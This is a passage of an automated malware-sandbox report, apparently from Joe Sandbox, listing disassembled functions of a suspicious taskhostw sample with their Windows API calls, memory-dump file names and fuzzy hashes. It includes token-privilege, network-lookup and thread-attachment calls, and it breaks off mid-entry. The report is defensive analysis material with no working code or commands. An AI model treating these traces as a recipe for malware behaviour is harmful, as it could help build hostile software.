LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00D489CB
_memcmp.LIBCMT ref: 00D489EE
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00D48A24
HeapFree.KERNEL32(00000000), ref: 00D48A2B

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
String ID:
API String ID: 1592001646-0
Opcode ID: dad46f1e150265336460cbf463e66d04c14282dab4cf5a76588ed341e602f031
Instruction ID: 389687467b164e6fa64cc0458ae3007b9cb4056488675307b935e6d0a2612710
Opcode Fuzzy Hash: dad46f1e150265336460cbf463e66d04c14282dab4cf5a76588ed341e602f031
Instruction Fuzzy Hash: BB219A31E40209EFCB10CFA4C945BEEB7B8EF40381F08405AE858AB240EB70AA45DF71

Function 00D10B0C Relevance: 6.1, APIs: 4, Instructions: 79COMMON

Download Yara Rule

APIs

__setmode.LIBCMT ref: 00D10B2E

Part of subcall function 00CF5B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00D5793F,?,?,00000000), ref: 00CF5B8C
Part of subcall function 00CF5B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00D5793F,?,?,00000000,?,?), ref: 00CF5BB0

_fprintf.LIBCMT ref: 00D10B65
OutputDebugStringW.KERNEL32(?), ref: 00D46111

Part of subcall function 00D14C1A: _flsall.LIBCMT ref: 00D14C33

__setmode.LIBCMT ref: 00D10B9A

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
String ID:
API String ID: 521402451-0
Opcode ID: 09abe87adcd8289ba52b4e353084d864c75a67566854cb6d58d513f315ca64aa
Instruction ID: 04d9581f5480d1cc3f36dc767ce12dbbc16a2d6d7f2a8835074f4f3cc2ca657d
Opcode Fuzzy Hash: 09abe87adcd8289ba52b4e353084d864c75a67566854cb6d58d513f315ca64aa
Instruction Fuzzy Hash: F9113A325082087EDB0477B4BC429FD7B6DDF41324F14002AF209A71C2EE615CC557B6

Function 00D25262 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00D25281

Part of subcall function 00D1588C: __FF_MSGBANNER.LIBCMT ref: 00D158A3
Part of subcall function 00D1588C: __NMSG_WRITE.LIBCMT ref: 00D158AA
Part of subcall function 00D1588C: RtlAllocateHeap.NTDLL(00670000,00000000,00000001,00000000,?,?,?,00D10F53,?), ref: 00D158CF

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: ac0c203fe9a82b37005153ff1d2b3a3335e65ba4b9a61ab7aa5ab602fba18508
Instruction ID: 860ccab9cacf8564071fc5e5acc875f10786a0931fd251a761ba46dd400a60cc
Opcode Fuzzy Hash: ac0c203fe9a82b37005153ff1d2b3a3335e65ba4b9a61ab7aa5ab602fba18508
Instruction Fuzzy Hash: 4611E732506A25FFDF306F70BC05AAE3799EF20364B240529F844DA294EE35898097B8

Function 00D6647F Relevance: 6.1, APIs: 4, Instructions: 61networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00CF5B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00D5793F,?,?,00000000), ref: 00CF5B8C
Part of subcall function 00CF5B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00D5793F,?,?,00000000,?,?), ref: 00CF5BB0

gethostbyname.WSOCK32(?,?,?), ref: 00D664AF
WSAGetLastError.WSOCK32(00000000), ref: 00D664BA
_memmove.LIBCMT ref: 00D664E7
inet_ntoa.WSOCK32(?), ref: 00D664F2

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
String ID:
API String ID: 1504782959-0
Opcode ID: d6a38a5b97cd50afa103583b1278dc9489ce150937c4100ad28df859ac84049a
Instruction ID: b81d74cb43a5407c01d2671641e56e01c6f3bf12853e12db0b97e384c43a8c99
Opcode Fuzzy Hash: d6a38a5b97cd50afa103583b1278dc9489ce150937c4100ad28df859ac84049a
Instruction Fuzzy Hash: E6111F71500509AFCB14EBA4DD86DAEB7B8EF04310B144165F606A72A1EF31AE54EB72

Function 00CF1290 Relevance: 6.1, APIs: 4, Instructions: 59COMMON

Download Yara Rule

APIs

Part of subcall function 00CF2612: GetWindowLongW.USER32(?,000000EB), ref: 00CF2623

DefDlgProcW.USER32(?,00000020,?), ref: 00CF12D8
GetClientRect.USER32(?,?,?,?,?), ref: 00D2B77B
GetCursorPos.USER32(?), ref: 00D2B785
ScreenToClient.USER32(?,?), ref: 00D2B790

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: Client$CursorLongProcRectScreenWindow
String ID:
API String ID: 4127811313-0
Opcode ID: b320bf500a8232663cd496d40373fc66b3239265fa67646f0ea319077707b66f
Instruction ID: 307ae6b33e5f5991968eb34461d6585fb0eaa73bef21569c38d9d2c2a555e1b1
Opcode Fuzzy Hash: b320bf500a8232663cd496d40373fc66b3239265fa67646f0ea319077707b66f
Instruction Fuzzy Hash: BF112535A0011DEFCB10EFA8D8859FE77B8FB05310F440456FA01E7250D730AA919BB6

Function 00D48E03 Relevance: 6.1, APIs: 4, Instructions: 59windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000B0,?,?), ref: 00D48E23
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00D48E35
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00D48E4B
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00D48E66

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 4c73b7cc3bcd79ac9f36f9fdf22166b4377994900dbdfc84f05d6d9bea1663fb
Instruction ID: b8f90628fa86fdf11e731a21ba990f95e5d82392215aac0347880fdef64a3e0b
Opcode Fuzzy Hash: 4c73b7cc3bcd79ac9f36f9fdf22166b4377994900dbdfc84f05d6d9bea1663fb
Instruction Fuzzy Hash: 15112E79901218FFDB11DFA5CC85E9DBB74FB48750F2040A5F904B7250DA716E50EBA4

Function 00D27137 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 00D2715B

Part of subcall function 00D27842: __fltout2.LIBCMT ref: 00D2786B

__cftog_l.LIBCMT ref: 00D27181
__cftoe_l.LIBCMT ref: 00D271B3

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
Instruction ID: c6148d16267c29e6080fc9ecda608916db7e67839b369d08cfd15c1a4d15d7f6
Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
Instruction Fuzzy Hash: E601433244825EBBCF235F84EC068EE3F26BF28359B599415FE5854131D336C9B1ABA1

Function 02AB6537 Relevance: 6.0, APIs: 4, Instructions: 48COMMON

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 02AB655B

Part of subcall function 02AB6C42: __fltout2.LIBCMT ref: 02AB6C6B

__cftog_l.LIBCMT ref: 02AB6581
__cftoe_l.LIBCMT ref: 02AB65B3

Memory Dump Source

Source File: 00000005.00000003.362011694.0000000002A80000.00000004.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: true

Associated: 00000005.00000003.362011694.0000000002B33000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000003.362011694.0000000002B41000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_3_2a80000_taskhostw.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
Instruction ID: ff05e29ecc55d41c908619fa4bcbd345b6669e484f296e2fb24f6d49ce44cae8
Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
Instruction Fuzzy Hash: 5201367208014ABBCF175F84CC418EE3F2ABF19A55B488615FA1898026DB36C6B1EB81

Function 00D7B2F9 Relevance: 6.0, APIs: 4, Instructions: 47COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00D7B318
ScreenToClient.USER32(?,?), ref: 00D7B330
ScreenToClient.USER32(?,?), ref: 00D7B354
InvalidateRect.USER32(?,?,?), ref: 00D7B36F

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: ClientRectScreen$InvalidateWindow
String ID:
API String ID: 357397906-0
Opcode ID: f097473446f83341acdd48c3a5ac013c1b7a8edc4b548e7e4822df89e0f456f4
Instruction ID: c580f541bf0ed78c07fa7c95f47c8d291d4aa9190d6008e5114c6a0b1f651e9c
Opcode Fuzzy Hash: f097473446f83341acdd48c3a5ac013c1b7a8edc4b548e7e4822df89e0f456f4
Instruction Fuzzy Hash: 50114675D00209EFDB51DF98C884AEEBBB5FB08310F108166E914E3220E735AA558F60

Function 00D56C83 Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 00D56C8F

Part of subcall function 00D5776D: _memset.LIBCMT ref: 00D577A2

_memmove.LIBCMT ref: 00D56CB2
_memset.LIBCMT ref: 00D56CBF
LeaveCriticalSection.KERNEL32(?), ref: 00D56CCF

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: CriticalSection_memset$EnterLeave_memmove
String ID:
API String ID: 48991266-0
Opcode ID: 152fac3662db15eb89b7cbce1001265150c7cb9f0c81a018095ce5791dc115fe
Instruction ID: 0316ba8be281a33db5ac923e2bf04a0d7d07b24885d4a92622b2d7358201a6d6
Opcode Fuzzy Hash: 152fac3662db15eb89b7cbce1001265150c7cb9f0c81a018095ce5791dc115fe
Instruction Fuzzy Hash: 34F0543A104214BBCF116F55EC85E8ABB29FF49321F148065FE089F21BDB31A951DBB4

Function 00D4A15C Relevance: 6.0, APIs: 4, Instructions: 30threadwindowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00D4A179
GetWindowThreadProcessId.USER32(?,00000000), ref: 00D4A18C
GetCurrentThreadId.KERNEL32(00000000), ref: 00D4A193
AttachThreadInput.USER32(00000000), ref: 00D4A19A

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
String ID:
API String ID: 2710830443-0
Opcode ID: a56e72b2b9cd4651731f40df065bf1e99b685e5ec3a79824274d58ed235af62c
Instruction ID: cf71ff67027325908cb274228ce87d1e09e5c7be94fa3de3df630b17d384742e
Opcode Fuzzy Hash: a56e72b2b9cd4651731f40df065bf1e99b685e5ec3a79824274d58ed235af62c
Instruction Fuzzy Hash: D7E03931185328BBEB201BA2DC0CEDB3F5CEF267A1F448024F94CC8060D6718580CBB0

Function 00CF2218 Relevance: 6.0, APIs: 4, Instructions: 23COMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008,00000000), ref: 00CF2231
SetTextColor.GDI32(?,000000FF), ref: 00CF223B
SetBkMode.GDI32(?,00000001), ref: 00CF2250
GetStockObject.GDI32(00000005), ref: 00CF2258
GetWindowDC.USER32(?), ref: 00D2C003
GetPixel.GDI32(00000000,00000000,00000000), ref: 00D2C010
GetPixel.GDI32(00000000,?,00000000), ref: 00D2C029
GetPixel.GDI32(00000000,00000000,?), ref: 00D2C042
GetPixel.GDI32(00000000,?,?), ref: 00D2C062
ReleaseDC.USER32(?,00000000), ref: 00D2C06D

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
String ID:
API String ID: 1946975507-0
Opcode ID: 32bd9ea3ae7dd8987edcc78f22092e4fb6e7cffa66aab2d9128e9dca695bae00
Instruction ID: 92afa04f90c3e51292463e63e5379d7b4a5d2439bc07e57035bedbc95824714f
Opcode Fuzzy Hash: 32bd9ea3ae7dd8987edcc78f22092e4fb6e7cffa66aab2d9128e9dca695bae00
Instruction Fuzzy Hash: C3E01532104344AAEB315B64FC097E83B10EB15336F048366FA69880E197724AD09B22

Function 00D48A3A Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32(00000028,00000000,?,00000000,00D484BD,?,?,?,00D4860E), ref: 00D48A43
OpenThreadToken.ADVAPI32(00000000,?,?,?,00D4860E), ref: 00D48A4A
GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00D4860E), ref: 00D48A57
OpenProcessToken.ADVAPI32(00000000,?,?,?,00D4860E), ref: 00D48A5E

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: CurrentOpenProcessThreadToken
String ID:
API String ID: 3974789173-0
Opcode ID: eed01d7a9203e85021a229302d97ceeb57d110be1f5e99e978ca5ff62dd73f5a
Instruction ID: ae82b19f90619e4393aef264608bb588478157cb274521b88d61f4262aa3f81c
Opcode Fuzzy Hash: eed01d7a9203e85021a229302d97ceeb57d110be1f5e99e978ca5ff62dd73f5a
Instruction Fuzzy Hash: 46E04F366013119FD7305FB06D0DB5A3BA8AF50792F084828A28ADA140EA6494C19770

Function 00D320B6 Relevance: 6.0, APIs: 4, Instructions: 20COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 00D320B6
GetDC.USER32(00000000), ref: 00D320C0
GetDeviceCaps.GDI32(00000000,0000000C), ref: 00D320E0
ReleaseDC.USER32(?), ref: 00D32101

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: b6aca30c11c8228a16b5b5745c92c7afab109d531a7804eba869bbcaab03d411
Instruction ID: 629af9562dd9b8678d2eff1456e88457e36a85a66020735b4aa0aad9e9e20c1e
Opcode Fuzzy Hash: b6aca30c11c8228a16b5b5745c92c7afab109d531a7804eba869bbcaab03d411
Instruction Fuzzy Hash: 2EE0E575804308EFCB61AF60C8087AD7BB1EB4C310F108025F95AD7320EB388181AF61

Function 00D320CA Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 00D320CA
GetDC.USER32(00000000), ref: 00D320D4
GetDeviceCaps.GDI32(00000000,0000000C), ref: 00D320E0
ReleaseDC.USER32(?), ref: 00D32101

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: 98fd9b3998a7644fba6200dafc8658d03541d0b3f1e3883474f74d766d115136
Instruction ID: 8ff04e110b924a1283ee8ec75f75fe1fb3193596fe3f8ede4d9b6d122f63cb10
Opcode Fuzzy Hash: 98fd9b3998a7644fba6200dafc8658d03541d0b3f1e3883474f74d766d115136
Instruction Fuzzy Hash: 6FE0E575804308AFCB619F60C8086AD7BA1EB4C310F108025F95AD7320EB3891819F51

Function 02AFA3B7 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 313COMMON

Download Yara Rule

APIs

__itow_s.LIBCMT ref: 02AFA4C3

Strings

xbL, xrefs: 02AFA4F9
xbL, xrefs: 02AFA525

Memory Dump Source

Source File: 00000005.00000003.362011694.0000000002A80000.00000004.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: true

Associated: 00000005.00000003.362011694.0000000002B33000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000003.362011694.0000000002B41000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_3_2a80000_taskhostw.jbxd

Similarity

API ID: __itow_s
String ID: xbL$xbL
API String ID: 3653519197-3351732020
Opcode ID: 56073d7c24255b46c9ca68ff61e3126421b9fb5d4b911621f3f11c69bd685f99
Instruction ID: fc0c60bbda7da4fe811c608b38ff83d630607c26cc3b585659aed913d34e1f41
Opcode Fuzzy Hash: 56073d7c24255b46c9ca68ff61e3126421b9fb5d4b911621f3f11c69bd685f99
Instruction Fuzzy Hash: BFB16175A00205AFCB54EF94C990EEAB7BAFF58300F148059FA499B252EF34D941CF60

Function 00D5B038 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 201shareCOMMON

Download Yara Rule

APIs

Part of subcall function 00D0FE06: _wcscpy.LIBCMT ref: 00D0FE29

Part of subcall function 00CF9997: __itow.LIBCMT ref: 00CF99C2
Part of subcall function 00CF9997: __swprintf.LIBCMT ref: 00CF9A0C

__wcsnicmp.LIBCMT ref: 00D5B0B9
WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 00D5B182

Strings

LPT, xrefs: 00D5B0B3

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
String ID: LPT
API String ID: 3222508074-1350329615
Opcode ID: 9b14074f94fcc87babb8cf0a4da0abdaef2fd02f52cc82007333db339d112654
Instruction ID: 284f3efb8f81414fc0322eca675ce807b0f705a199b33856c120ce9da5eb7606
Opcode Fuzzy Hash: 9b14074f94fcc87babb8cf0a4da0abdaef2fd02f52cc82007333db339d112654
Instruction Fuzzy Hash: 31615075A00219AFCF14DF94C891EAEB7B4EF08321F15405AFD56AB291DB70AE44CBA1

Function 02A865EB Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 201COMMON

Download Yara Rule

APIs

_wcscat.LIBCMT ref: 02ABE0F9

Strings

\, xrefs: 02ABE11C

Memory Dump Source

Source File: 00000005.00000003.362011694.0000000002A80000.00000004.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: true

Associated: 00000005.00000003.362011694.0000000002B33000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000003.362011694.0000000002B41000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_3_2a80000_taskhostw.jbxd

Similarity

API ID: _wcscat
String ID: \
API String ID: 2563891980-2967466578
Opcode ID: e56d7c4266432a0f4c02bf2e6b1fbb6acfac889eda8ece4603485dfb309dafd5
Instruction ID: a04300a2a7dc9a9a44216a57793d03808c389755ef29915602a2c9f773ae7fb0
Opcode Fuzzy Hash: e56d7c4266432a0f4c02bf2e6b1fbb6acfac889eda8ece4603485dfb309dafd5
Instruction Fuzzy Hash: DB718A71048301AED704FF25EA80D9BBBE9FF99700B91897EE445831A0EF719948CF5A

Function 02AFE932 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 177COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 02AFE95C
_memset.LIBCMT ref: 02AFEA25

